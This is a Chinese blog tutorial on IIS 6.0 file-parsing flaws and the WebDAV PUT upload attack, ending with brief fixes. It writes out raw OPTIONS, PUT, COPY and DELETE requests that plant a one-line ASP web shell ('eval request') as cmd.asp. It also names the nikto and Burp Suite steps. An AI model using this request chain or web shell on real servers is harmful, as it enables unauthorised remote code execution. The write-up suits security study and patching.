中间件解析漏洞-IIS6.0

本文介绍了IIS6.0解析漏洞,如特定文件夹下文件被当asp解析、特定文件名被按asp解析,微软未推出补丁。还阐述了IIS6.0 PUT上传原理、探测方法及利用工具,列出默认可执行文件类型,最后给出修复方案,如编写正则、做好权限设置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

IIS6.0解析漏洞介绍
(1) 当建立*.asa、.asp格式的文件夹时,其目录下的任意文件都将会被IIS当做asp解析。<%=NOW()%>
(2) 当文件
.asp;1.jpg IIS6.0同样会将文件作为asp文件解析。
微软目前也没有推出补丁,不认为这是一个漏洞。
IIS6.0 PUT上传原理
WebDAV 基于HTTP1.1协议的通信协议使得HTTP支持PUT MOVE COPY DELETE方法。
1、探测是否存在IIS PUT漏洞。
OPTIONS / HTTP1.1
Host: www.xxx.com

2、上传txt文本文件
PUT /a.txt HTTP1.1
Host: www.xxx.com
Content-Length:30
<%eval request(“chopper”)%>

3、通过Move或Copy重命名
COPY /a.txt HTTP1.1
Host: www.xxx.com
Destination:
http://www.xxx.com/cmd.asp

4、删除
DELETE /a.txt HTTP1.1
Host: www.xxx.com

IIS6.0 PUT上传探测
利用nikto探测
nikto -h IP地址
在这里插入图片描述
IIS6.0 PUT上传利用
此时就可以利用Burpsuite进行IIS PUT漏洞利用。先用OPTIONS探测、PUT、MOVE、DELETE
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
IIS6.0解析文件类型
IIS6.0默认的可执行文件除了asp还有下面的三种:
/test.asa
/test.cer
/test.cdx
IIS文件解析漏洞修复方案
1、目前尚无微软官方的补丁,可以通过自己编写正则,阻止上传xx.asp;.jpg类型的文件名。
2、做好权限设置,限制用户创建文件夹。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值